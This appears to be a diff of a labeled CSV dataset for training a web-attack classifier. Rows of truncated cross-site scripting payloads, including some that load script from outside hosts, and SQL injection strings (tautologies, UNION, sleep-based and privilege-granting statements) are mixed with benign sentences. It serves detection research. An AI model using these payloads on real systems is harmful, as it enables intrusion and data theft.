contenteditable>test<",1,XSS,3835 +Only a select handful will have the opportunity to,0,normal,25819 +<nobr id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,4779 +"<br onmouseenter=""alert(1)"">test</br>",1,XSS,4279 +"<tr onkeyup=""alert(1)"" contenteditable>test</tr>",1,XSS,4961 +"{""id"":null,""name"":""beyond""}",0,normal,27065 +Please select a song.,0,normal,24336 +-8004%' ) or ( 2301 = 7504 ) *7504 and ( '%' = ',2,SQLi,16665 +stored,0,normal,23158 +<discard onpointerup=alert(1)>XSS</discard>,1,XSS,7418 +<noscript onpointerdown=alert(1)>XSS</noscript>,1,XSS,3255 +Where's your SQL handbook?,0,normal,23404 +"1%"" and 8594 = ( select 8594 from pg_sleep ( 5 ) )",2,SQLi,16676 +"1"" ) ) ) and ( select 2* ( if ( ( select * from ( ",2,SQLi,19462 +Select your demand.,0,normal,24964 +Select restart.,0,normal,24590 +Where's the theater?,0,normal,23540 +"1%"" ) and 8148 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,14303 +-2756' where 6156 = 6156 or 4144 = ( select upper ,2,SQLi,15526 +-6890' ) ) or 5771 = 7721--,2,SQLi,14273 +"1"" ) ) as osuh where 8809 = 8809",2,SQLi,12330 +or '' = ',2,SQLi,11549 +"1%"" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,15642 +"1"" ) where 6843 = 6843 or 6793 = ( select 6793 fro",2,SQLi,15045 +1' where 7353 = 7353 or 8156 = ( select count ( * ,2,SQLi,14211 +"<? echo('<SCR)'; echo('IPT>alert("""")</SCRIPT>'); ?",1,XSS,2470 +Select mentor.,0,normal,24716 +"-3194"" ) ) ) or 4493 = utl_inaddr.get_host_address",2,SQLi,16657 +1 ) and 8514 = ( select count ( * ) from domain.do,2,SQLi,20957 +or 1 = 1,2,SQLi,11760 +"1%"" ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( c",2,SQLi,13872 +1 ) ) ) or sleep ( 5 ) #,2,SQLi,17001 +<button onBeforeUnload=javascript:alert(1)>,1,XSS,9586 +<rt id=x tabindex=1 onfocus=alert(1)></rt>,1,XSS,6699 +1 ) and 8407 = ( select count ( * ) from generate_,2,SQLi,20703 +"<ul onkeydown=""alert(1)"" contenteditable>test</ul>",1,XSS,3183 +select pg_sleep ( 5 ) and ( ( ( 'mgbm' like 'mgbm,2,SQLi,15092 +1' in boolean mode ) or 7552 = ( select count ( * ,2,SQLi,17809 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8278 +"<a target=""x"" href=""xssme?xss=<script>function x(w",1,XSS,9068 +")) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11033 +Select optimize.,0,normal,24621 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4560 +"<xmp onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,7815 +-1244 ) as qszw where 2332 = 2332 union all select,2,SQLi,12842 +"<style>@keyframes slidein {}</style><menu style=""a",1,XSS,6300 +"{""id"":null,""firstName"":""Helen"",""lastName"":""Ho"",""ad",0,normal,27413 +-3881 ) ) ) union all select 4438--,2,SQLi,14537 +"{""id"":null,""firstName"":""Kinki"",""lastName"":""Lws"",""a",0,normal,27201 +“><ScRiPt>alert(document.cookie)</script>,1,XSS,1134 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10645 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10524 +Join the fitness club.,0,normal,22629 +Select the perfect song for the moment.,0,normal,24127 +""" Mobile (iOS) In Facebook's iOS app, select the i",0,normal,26474 +"<figure oncontextmenu=""alert(1)"">test</figure>",1,XSS,2873 +"1' ) ) procedure analyse ( extractvalue ( 5840,con",2,SQLi,12999 +1 ) as cnpv where 4902 = 4902 and elt ( 1210 = 121,2,SQLi,19167 +"<plaintext oncut=""alert(1)"" contenteditable>test</",1,XSS,1774 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10596 +"-2149"" ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( (",2,SQLi,21907 "<section onmouseover=""alert(1)"">test</section>",1,XSS,1915 -<style>:target {color: red;}</style><head id=x sty,1,XSS,7264 -"{""id"":null,""name"":""base""}",0,normal,27126 -"{""id"":null,""name"":""highway go""}",0,normal,27277 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10729 -"&lt;IMG SRC=\""javascript&#058;alert('XSS');\""&gt;",1,XSS,1105 -select * from users where id = 1 -@<@ union select,2,SQLi,12068 -<a id=x tabindex=1 onbeforeactivate=alert(1)></a>,1,XSS,2611 -and a='a,2,SQLi,9945 -"<sub oncontextmenu=""alert(1)"">test</sub>",1,XSS,5311 -Select the right direction to follow.,0,normal,24066 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11109 -1 and sleep 5,2,SQLi,11157 -"-2852%' ) or 1 group by concat ( 0x7171706a71, ( s",2,SQLi,22139 -<svg><set xlink:href=#xss attributeName=href from=,1,XSS,153 -1 and 2716 = ( select count ( * ) from sysusers as,2,SQLi,13423 -Select cover.,0,normal,24692 -"1"" ) ) and 6510 = ( select count ( * ) from sysuse",2,SQLi,22064 -<figcaption id=x tabindex=1 onactivate=alert(1)></,1,XSS,2833 -"{""id"":null,""name"":""Zonkey""}",0,normal,27473 -Calculate totals where necessary.,0,normal,23268 -"<noscript draggable=""true"" ondragleave=""alert(1)"">",1,XSS,3552 --3982 ) ) or 6872 = 6872 and ( ( 6331 = 6331,2,SQLi,20107 -Select the best ingredients for the recipe.,0,normal,24118 -Select the three dots at the top of the screen aga,0,normal,25578 -1 ) ) as mlpf where 7425 = 7425,2,SQLi,12542 -"<option onkeypress=""alert(1)"" contenteditable>test",1,XSS,4539 -"1"" ) union all select null,null,null,null,null,nul",2,SQLi,14368 -"With that in mind, both the The Real Estate Select",0,normal,25113 -or uid like '%,2,SQLi,10015 -1' ) ) ) and 4386 = utl_inaddr.get_host_address ( ,2,SQLi,12279 -"Now, select salad.",0,normal,24787 -"1%"" ) ) or extractvalue ( 1297,concat ( 0x5c,0x717",2,SQLi,15089 -1'+ ( select xruo where 5709 = 5709 and 7533 = 753,2,SQLi,18376 -"Contrary to the intent, the benefits skewed toward",0,normal,26266 -"<legend onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,5142 -select * from users where id = 1 <@$_ or 1 = 1 -- ,2,SQLi,11815 -1 ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( c,2,SQLi,20196 -"Open the drop-down menu labeled ""Select the skin y",0,normal,25812 -<var onpointerout=alert(1)>XSS</var>,1,XSS,3451 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,20976 -"1' union all select null,null,null,null,null,null#",2,SQLi,16590 -Sort wires.,0,normal,23065 -1'+ ( select 'cstd' where 9326 = 9326 and extractv,2,SQLi,13157 -<IMG SRC=JaVaScRiPt:alert('')>,1,XSS,2750 -1 ) where 8338 = 8338 and 6055 = ctxsys.drithsx.sn,2,SQLi,18234 -"At the bottom of the ""Overview"" page, select ""Dele",0,normal,26343 -"1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a",2,SQLi,19625 --8963 ) where 8528 = 8528 or ( 2470 = 3271 ) *3271,2,SQLi,12708 -"1 or 8384 = like ( 'abcdefg',upper ( hex ( randomb",2,SQLi,20467 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,19494 -1' ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113,2,SQLi,13132 -1' or 4411 = ( select count ( * ) from sysusers as,2,SQLi,12252 -"or 1=1 or """"=",2,SQLi,10180 --3597' ) ) order by 1--,2,SQLi,22319 -"<fieldset onbeforecopy=""alert(1)"" contenteditable>",1,XSS,5811 -<style>:target {color:red;}</style><marquee id=x s,1,XSS,5635 --1606'|| ( select 'qbaa' where 3967 = 3967 union a,2,SQLi,20692 -select * from users where id = 1. or 1 = 1 -- 1,2,SQLi,11581 -1' where 6035 = 6035 waitfor delay '0:0:5'--,2,SQLi,19541 -1 ) as azoo where 8933 = 8933 and ( 3020 = 3020 ) ,2,SQLi,13927 -Update your wardrobe with new clothes.,0,normal,22919 -“I do think that being able to select different pe,0,normal,26443 -&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascr,1,XSS,1381 -Scarcely any one dreamed that individual subjects ,0,normal,25704 -1' ) ) as dtwh where 9633 = 9633 and char ( 109 ) ,2,SQLi,14902 -"<frameset onmouseout=""alert(1)"">test</frameset>",1,XSS,3833 -Only a select few anticipated this much pain for t,0,normal,25822 -"<dir onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,4777 -"<style>@keyframes x{}</style><tr style=""animation-",1,XSS,4277 +"-1376%"" ) ) ) or 3458 = 9503 and ( ( ( ""%"" = """,2,SQLi,14215 +I want to select a book for my book club.,0,normal,23973 +<script src=//brutelogic.com.br/1.js>,1,XSS,9259 +"-3316%"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113",2,SQLi,20173 +"-7531' ) union all select 3072,3072,3072,3072,3072",2,SQLi,12605 +Where's the perfect spot to have a picnic?,0,normal,23875 +1' ) ) ) and 7533 = 7533 and ( ( ( 'suzd' like 'su,2,SQLi,14191 +-2411 or ( 8459 = 8459 ) *4906# pxwg,2,SQLi,15420 +1 or sleep ( 5 ) #,2,SQLi,18548 +1'+ ( select 'mjgo' where 4026 = 4026,2,SQLi,19395 +";!--\""&lt;XSS&gt;=&{()}",1,XSS,1107 +I'm considering where to go for a weekend retreat.,0,normal,23780 +select ( case when ( 4306 = 2815 ) then 4306 else ,2,SQLi,17079 +Select can.,0,normal,24523 <rt id=x tabindex=1 onfocusin=alert(1)></rt>,1,XSS,4959 -"{""id"":null,""firstName"":""Chin Huat"",""lastName"":""Lim",0,normal,27068 -Carefully select the menu.,0,normal,24339 -"1"" ) and exp ( ~ ( select * from ( select concat (",2,SQLi,16663 -row,0,normal,23156 -"<ol draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,7416 -"<svg onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,3253 -Where's your SQL documentation?,0,normal,23407 -select ( case when ( 7033 = 1594 ) then 7033 else ,2,SQLi,16674 --4480' ) where 4661 = 4661 or 1570 = convert ( int,2,SQLi,19460 -Select your query.,0,normal,24967 -Select upload.,0,normal,24593 -Where's the bar?,0,normal,23543 -"-8319"" ) ) or 7878 = 5970 and ( ( ""jcaz"" like ""jca",2,SQLi,14301 -1' ) as rhvm where 1420 = 1420,2,SQLi,15524 -1 ) ) as ewlg where 3722 = 3722 rlike sleep ( 5 ) ,2,SQLi,14271 -"1' where 5702 = 5702 and elt ( 3114 = 3114,sleep (",2,SQLi,12328 -select * from users where id = '1' ||1 union selec,2,SQLi,11547 -select pg_sleep ( 5 ) and ( ( ( 'qslr' = 'qslr,2,SQLi,15640 -1'|| ( select 'sned' where 4957 = 4957 and 9254 = ,2,SQLi,15043 -select sleep ( 5 ) #,2,SQLi,14209 -<canvas id=x tabindex=1 onfocus=alert(1)></canvas>,1,XSS,2469 -Select study.,0,normal,24719 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,16655 -1 ) ) as beld where 1679 = 1679 or sleep ( 5 ) #,2,SQLi,20955 -"select * from users where id = 1 or ""$ ( "" or 1 = ",2,SQLi,11758 -"1' ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4",2,SQLi,13870 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,16999 -<button onBeforePaste=javascript:alert(1)>,1,XSS,9584 -"<bdo onkeyup=""alert(1)"" contenteditable>test</bdo>",1,XSS,6697 -1%' ) ) ) rlike sleep ( 5 ) #,2,SQLi,20701 -<audio id=x controls onfocus=alert(1) id=x><source,1,XSS,3181 -"1"" ) union all select null,null,null,null,null--",2,SQLi,15090 -"1"" ) as ckoi where 4674 = 4674 union all select nu",2,SQLi,17807 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8276 -"<a target=""x"" href=""xssme?xss=%3Cscript%3EaddEvent",1,XSS,9066 -")) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11031 -Select reset.,0,normal,24624 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4558 -"<figcaption onkeyup=""alert(1)"" contenteditable>tes",1,XSS,7813 -"1%"" ) ) and 6537 = dbms_pipe.receive_message ( chr",2,SQLi,12840 -/?param=<javascript:alert(document.cookie>),1,XSS,6298 -"{""id"":null,""firstName"":""Helen"",""lastName"":""Ho"",""ad",0,normal,27413 -1 ) ) as trin where 8843 = 8843,2,SQLi,14535 -"{""id"":null,""firstName"":""Datok Yusof"",""lastName"":""Y",0,normal,27203 -%253cscript%253ealert(document.cookie)%253c/script,1,XSS,1133 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10643 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10522 -Where's the missing piece?,0,normal,22627 -Select the right tool for the task.,0,normal,24130 -""" From there, press ""Background App Refresh"" and s",0,normal,26477 -"<spacer onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,2872 --2397 ) ) as oizy where 1746 = 1746 union all sele,2,SQLi,12997 -1 or ( select * from ( select ( sleep ( 5 ) ) ) yd,2,SQLi,19165 -"<A HREF=""http://ha.ckers.org@google""></A>",1,XSS,1773 -"UNION SELECT @@VERSION,SLEEP(5),USER(),4",2,SQLi,10594 -"1"" ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( ",2,SQLi,21905 -<style>:target {color: red;}</style><u id=x style=,1,XSS,1914 -1%' ) ) ) and 3916 = 6327--,2,SQLi,14213 -I'm considering where to attend a workshop.,0,normal,23976 -"<script src=""javascript:alert(3)""></script> // IE6",1,XSS,9257 -"-5857%"" ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( ",2,SQLi,20171 -"iif ( 2452 = 8999,1,1/0 )",2,SQLi,12603 -I want to choose a game for family game night.,0,normal,23878 -"-4015"" where 2610 = 2610 or 1 group by concat ( 0x",2,SQLi,14189 -"1"" ) as frmp where 6073 = 6073",2,SQLi,15418 -1 ) as zmjm where 9125 = 9125 or char ( 68 ) ||cha,2,SQLi,18546 -1' ) ) ) and 1743 = 6793 and ( ( ( 'rgcv' = 'rgcv,2,SQLi,19393 -&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss,1,XSS,1106 -Where did you find that cozy reading nook?,0,normal,23783 -1' ) where 8163 = 8163,2,SQLi,17077 -Select plate.,0,normal,24526 -<s onpointerout=alert(1)>XSS</s>,1,XSS,4957 -<textarea onbeforecut=alert(1) autofocus>XSS</text,1,XSS,8308 -"{""id"":null,""name"":""that tiny""}",0,normal,26828 -"1"" ) ) as rrms where 8185 = 8185 union all select ",2,SQLi,20754 -"1"" ) where 1144 = 1144 and 2006 = 2006",2,SQLi,19150 -"1"" ) ) as yiaw where 2841 = 2841 or sleep ( 5 ) --",2,SQLi,20314 -Select the right colors for the design.,0,normal,24207 -<dt id=x tabindex=1 ondeactivate=alert(1)></dt><in,1,XSS,3697 -"<summary draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,7779 -Where's the stadium?,0,normal,23538 +<img src=validimage.png onloadend=alert(1)>,1,XSS,8310 +"{""id"":null,""name"":""Goldeen""}",0,normal,26825 +"1%"" ) ) ) and 2006 = 2006",2,SQLi,20756 +1 ) where 7748 = 7748 and 9254 = ( select count ( ,2,SQLi,19152 +1' ) ) ) rlike sleep ( 5 ) and ( ( ( 'svuu' = 'svu,2,SQLi,20316 +Select the best course for your studies.,0,normal,24204 +<command onblur=alert(1) tabindex=1 id=x></command,1,XSS,3699 +<content onpointerleave=alert(1)>XSS</content>,1,XSS,7781 +Where's the playground?,0,normal,23535 "<table background=""javascript:javascript:alert(1)""",1,XSS,629 -"<style>@keyframes slidein {}</style><dd style=""ani",1,XSS,2452 -SplitBear lets you select apps that are exempt fro,0,normal,25526 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,20209 -"Escape to the tranquility of the spa, indulge in s",0,normal,26213 +<slot onpointerenter=alert(1)>XSS</slot>,1,XSS,2453 +"Instead of dragging around handles, Android will a",0,normal,25984 +"1"" ) ) ) or updatexml ( 1808,concat ( 0x2e,0x71717",2,SQLi,20211 +"Eventually, Mr. Spodek also tried to help select t",0,normal,26210 "{""id"":null,""name"":""AlakazamMega Alakazam""}",0,normal,27565 -1 ) ) as eveb where 7567 = 7567,2,SQLi,20128 -"<kbd onmouseleave=""alert(1)"">test</kbd>",1,XSS,2177 -Filter posts.,0,normal,23074 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,19703 -Where's the arboretum?,0,normal,23594 -"<style onmouseout=""alert(1)"">test</style>",1,XSS,2788 -1' ) ) as eymg where 7000 = 7000,2,SQLi,12298 -"<IMG SRC=x onkeyup=""alert(String.fromCharCode(88,8",1,XSS,1197 -"1"" ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( ""a",2,SQLi,18061 -1' ) ) and ( 3020 = 3020 ) *6703 and ( ( 'mgfd' = ,2,SQLi,20332 -"<optgroup oncontextmenu=""alert(1)"">test</optgroup>",1,XSS,7619 -"<noembed onpaste=""alert(1)"" contenteditable>test</",1,XSS,4445 -"exec sp_addsrvrolemember 'name' , 'sysadmin'",2,SQLi,11129 -1 ) ) and ( select 2* ( if ( ( select * from ( sel,2,SQLi,15515 -"<SCRIPT a=`>` SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,5723 -Select your preferred date.,0,normal,24463 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10696 -"""We are writing to officially invoke our right to ",0,normal,26448 -1'+ ( select 'jaok' where 2592 = 2592,2,SQLi,18754 -"<noscript onmouseup=""alert(1)"">test</noscript>",1,XSS,4968 -"1"" ) ) as luon where 4676 = 4676 rlike sleep ( 5 )",2,SQLi,18602 -RANDOMBLOB(500000000/2),2,SQLi,10411 -"1"" ) ) and elt ( 3785 = 9386,9386 ) and ( ( ""inwa""",2,SQLi,19711 -"<style>@keyframes x{}</style><input style=""animati",1,XSS,4010 -1 ) ) ) and ( select 2* ( if ( ( select * from ( s,2,SQLi,15516 -<source onpointerout=alert(1)>XSS</source>,1,XSS,3584 -"{""id"":null,""name"":""luck""}",0,normal,27314 -"1"" and make_set ( 4214 = 9503,9503 ) and ""phjg"" li",2,SQLi,18021 -"1"" ) where 1212 = 1212 and 8475 = 5864",2,SQLi,20004 -Modify the game settings.,0,normal,22602 -"1"" ) as amak where 7938 = 7938 and elt ( 1210 = 12",2,SQLi,18853 -1 ) as bhdj where 4472 = 4472,2,SQLi,12425 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8278 -Update your hairstyle.,0,normal,22621 -1' ) ) as dipp where 1714 = 1714,2,SQLi,22358 -"<textarea onkeyup=""alert(1)"" contenteditable>test<",1,XSS,3668 --6514 ) ) as pbgg where 6841 = 6841 union all sele,2,SQLi,12475 -"1"" ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ",2,SQLi,21543 -"1"" and sleep ( 5 ) and ""tdid"" like ""tdid",2,SQLi,12783 -HAVING 1=0,2,SQLi,10212 -"<legend onmouseleave=""alert(1)"">test</legend>",1,XSS,3424 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10718 -"<style>@keyframes x{}</style><data style=""animatio",1,XSS,8200 -"-7119"" ) or 5903 = ( 'qqpjq'|| ( select case 5903 ",2,SQLi,18794 -"1%"" ) ) ) union all select null,null--",2,SQLi,19597 -Select the appropriate rating and add comments abo,0,normal,25600 -"<style>@keyframes x{}</style><link style=""animatio",1,XSS,5367 -1 where 7412 = 7412 and 6414 = ( select count ( * ,2,SQLi,17314 -Delete the old photos from your camera.,0,normal,22978 -<img src/onerror=alert(1)>,1,XSS,2896 -1'|| ( select 'jnsd' from dual where 2316 = 2316 u,2,SQLi,14123 -"<body onunload=""javascript:alert('XSS');"">",1,XSS,1297 -"<isindex draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,3643 -Let's explore where the city skyline is visible.,0,normal,23767 -Then adjust the slider to select 800 x 600 or high,0,normal,25347 -"{""id"":null,""firstName"":""Hung"",""lastName"":""Tan"",""sp",0,normal,27196 -"{""id"":null,""firstName"":""Anthony"",""lastName"":""Chern",0,normal,26939 -<strong id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,8549 -"-8344 or 1570 = convert ( int, ( select char ( 113",2,SQLi,21643 -"<embed draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,5452 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10686 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,15450 -<svg><nextid onload=alert(1)></nextid>,1,XSS,7867 -1 ) ) and 4637 = 1408 and ( ( 6509 = 6509,2,SQLi,19128 -1' ) as qcse where 4147 = 4147 waitfor delay '0:0:,2,SQLi,12868 --4761 order by 1--,2,SQLi,14608 -><script+src=https://df-webservices.comet.aol.com/,1,XSS,9798 -"admin"" ) or ( ""1"" = ""1""#",2,SQLi,11756 -if ( 4735 = 8907 ) select 4735 else drop function ,2,SQLi,13980 -"1%"" ) union all select null,null--",2,SQLi,21343 -;confirm('XSS')//1491b2as,1,XSS,9739 -"1"" ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113",2,SQLi,14386 -<SCRIPT>alert('')</SCRIPT>,1,XSS,6475 -"<mark draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,8812 +"-3902' ) ) ) union all select 3999,3999,3999,3999,",2,SQLi,20130 +"<style>@keyframes x{}</style><dl style=""animation-",1,XSS,2178 +Select font.,0,normal,23076 +1' ) ) and 3526 = 1354,2,SQLi,19705 +Where's the botanical garden?,0,normal,23591 +"<style>@keyframes slidein {}</style><tr style=""ani",1,XSS,2789 +"1%"" ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x54",2,SQLi,12300 +"<IMG SRC=x onclick=""alert(String.fromCharCode(88,8",1,XSS,1198 +"1"" and 5556 = ( select count ( * ) from all_users ",2,SQLi,18063 +"1%' union all select null,null,null,null,null,null",2,SQLi,20334 +<style>:target {color:red;}</style><body id=x styl,1,XSS,7621 +"<style>@keyframes x{}</style><b style=""animation-n",1,XSS,4447 +grant connect to name; grant resource to name;,2,SQLi,11131 +1 rlike sleep ( 5 ) -- muhp,2,SQLi,15517 +<svg id=x tabindex=1 onbeforeactivate=alert(1)></s,1,XSS,5725 +Select the nearest store.,0,normal,24460 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10698 +The collection — which launches today in select st,0,normal,25475 +"1' ) ) ) procedure analyse ( extractvalue ( 9255,c",2,SQLi,18756 +"<style>@keyframes x{}</style><font style=""animatio",1,XSS,4970 +"1"" where 3740 = 3740 rlike sleep ( 5 ) #",2,SQLi,18604 +"OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000",2,SQLi,10413 +1 ) ) as vcvn where 2106 = 2106,2,SQLi,19713 +<object onerror=alert(1) data=1 type=image/gif>,1,XSS,4012 +1 rlike ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,15518 +<cite id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,3586 +"{""id"":null,""firstName"":""Lang"",""lastName"":""Zhang"",""",0,normal,27313 +1' or 4411 = ( select count ( * ) from sysusers as,2,SQLi,18023 +"1%"" ) ) ) and ( select * from ( select ( sleep ( 5",2,SQLi,20006 +Insert the fresh batteries.,0,normal,22604 +"1"" ) as bpmk where 4506 = 4506",2,SQLi,18855 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,12427 +<style>@keyframes slidein {}</style><frameset styl,1,XSS,8280 +Merge the company logos.,0,normal,22623 +"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,22360 +"<area onmouseleave=""alert(1)"">test</area>",1,XSS,3670 +select case when 6420 = 7941 then 1 else null end-,2,SQLi,12477 +"-9613"" ) ) ) or elt ( 3125 = 7084,7084 ) and ( ( (",2,SQLi,21545 +1' ) ) as kdse where 6767 = 6767 rlike sleep ( 5 ),2,SQLi,12785 +HAVING 1=0#,2,SQLi,10214 +"<select draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,3426 +UNION ALL SELECT NULL,2,SQLi,10720 +"<sup draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,8202 +1 ) ) and sleep ( 5 ) and ( ( 9084 = 9084,2,SQLi,18796 +"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,19599 +Select the device or TV from the available devices,0,normal,25597 +"<td onmousemove=""alert(1)"">test</td>",1,XSS,5369 +"1"" ) ) ) and 6537 = dbms_pipe.receive_message ( ch",2,SQLi,17316 +Create a stunning sculpture from clay.,0,normal,22980 +"<col onkeypress=""alert(1)"" contenteditable>test</c",1,XSS,2897 +1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ,2,SQLi,14125 +"<body onLoad=""alert('XSS');""",1,XSS,1298 +"<s oncut=""alert(1)"" contenteditable>test</s>",1,XSS,3645 +Let's decide where to have our lunch.,0,normal,23764 +Then they set off into the Ozarks to select trees.,0,normal,25344 +"{""id"":null,""name"":""height fierce""}",0,normal,27194 +"{""id"":null,""firstName"":""Douglas"",""lastName"":""Danap",0,normal,26936 +<abbr id=x tabindex=1 onfocus=alert(1)></abbr>,1,XSS,8551 +1 ) where 3738 = 3738 or 8421 = ( select count ( *,2,SQLi,21645 +"<style>@keyframes x{}</style><dfn style=""animation",1,XSS,5454 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10688 +"1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ",2,SQLi,15452 +"<cite oncut=""alert(1)"" contenteditable>test</cite>",1,XSS,7869 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,19130 +1%' ) ) ) and 8407 = ( select count ( * ) from gen,2,SQLi,12870 +"-4394' ) ) union all select 3409,3409--",2,SQLi,14610 +><script+src=https://api.cmi.aol.com/catalog/cms/h,1,XSS,9800 +"select * from users where id = 1 or ""$ ( "" or 1 = ",2,SQLi,11758 +1 where 5485 = 5485 or char ( 117 ) ||char ( 111 ),2,SQLi,13982 +1'|| ( select 'jslz' where 8405 = 8405 rlike ( sel,2,SQLi,21345 +<scr&#x9ipt>alert('XSS')</scr&#x9ipt>,1,XSS,9741 +1'+ ( select 'kicv' where 1976 = 1976 and 3754 = (,2,SQLi,14388 +"<style>@keyframes x{}</style><textarea style=""anim",1,XSS,6477 +<svg><tr onload=alert(1)></tr>,1,XSS,8814 "<a href=""\xE1\xA0\x8Ejavascript:javascript:alert(1",1,XSS,493 -"x' AND userid IS NULL, --",2,SQLi,11692 -Select sell.,0,normal,24770 -<frameset onload=alert(123)>,1,XSS,1117 -"<ol onbeforecut=""alert(1)"" contenteditable>test</o",1,XSS,5638 -<section onblur=alert(1) tabindex=1 id=x></section,1,XSS,5086 -"<frame oncut=""alert(1)"" contenteditable>test</fram",1,XSS,1758 -select * from users where id = 1 %$ 1 or 1 = 1 -- ,2,SQLi,11487 -He picked a beautiful flower from the garden.,0,normal,23828 -But a select group of living artists still remain ,0,normal,26314 -"<ol oncontextmenu=""alert(1)"">test</ol>",1,XSS,6354 -Where's the missing key to your room?,0,normal,22974 -As Jennings and Wlezien put it: [I]n presidential ,0,normal,26349 +select * from users where id = '1' or \.< = 1 unio,2,SQLi,11694 +Select deal.,0,normal,24767 +"<!--<img src=""--><img src=x onerror=alert(123)//"">",1,XSS,1118 +"<basefont draggable=""true"" ondragleave=""alert(1)"">",1,XSS,5640 +"<br draggable=""true"" ondrag=""alert(1)"">test</br>",1,XSS,5088 +"<frameset onmouseover=""alert(1)"">test</frameset>",1,XSS,1759 +"; if not ( substring ( ( select @@version ) ,25,1 ",2,SQLi,11489 +Where did you find that serene beach?,0,normal,23825 +"But if you're buying flowers online, all you need ",0,normal,26311 +"<nextid onpaste=""alert(1)"" contenteditable>test</n",1,XSS,6356 +Insert the fresh batteries into the remote.,0,normal,22976 +As well as the joint Work and Pensions Select Comm,0,normal,26346 "{""id"":null,""firstName"":""Kelvin Lee"",""lastName"":""Le",0,normal,27477 "{""id"":null,""firstName"":""Ally"",""lastName"":""Bella"",""",0,normal,27595 -1%' ) or 7417 = ( select count ( * ) from sysibm.s,2,SQLi,21626 -"<s oncut=""alert(1)"" contenteditable>test</s>",1,XSS,3645 --2582'+ ( select ggim where 5346 = 5346 union all ,2,SQLi,19168 -1' or 9643 = ( select count ( * ) from domain.doma,2,SQLi,14351 -""" or 1 = 1--",2,SQLi,12002 -Where did you discover that inspiring story from?,0,normal,23754 -` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SL,2,SQLi,11186 -"<IMG SRC=""jav&#x0A;ascript:alert(<WBR>'XSS');"">",1,XSS,1697 -waitfor delay '0:0:5' and ( ( '%' = ',2,SQLi,22070 -"<dt draggable=""true"" ondragend=""alert(1)"">test</dt",1,XSS,2296 --5580 or 4829 = 1968,2,SQLi,14795 -1%' and 1736 = 4220,2,SQLi,14697 -"<dfn onmousedown=""alert(1)"">test</dfn>",1,XSS,5940 -Drop down list 3 allows you to select a specific c,0,normal,26226 -or 1=1 --,2,SQLi,9969 -"))) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11034 -"<bdi draggable=""true"" ondragend=""alert(1)"">test</b",1,XSS,3314 -select case when 1802 = 7063 then 1 else null end-,2,SQLi,21166 -"1"" rlike ( select * from ( select ( sleep ( 5 ) 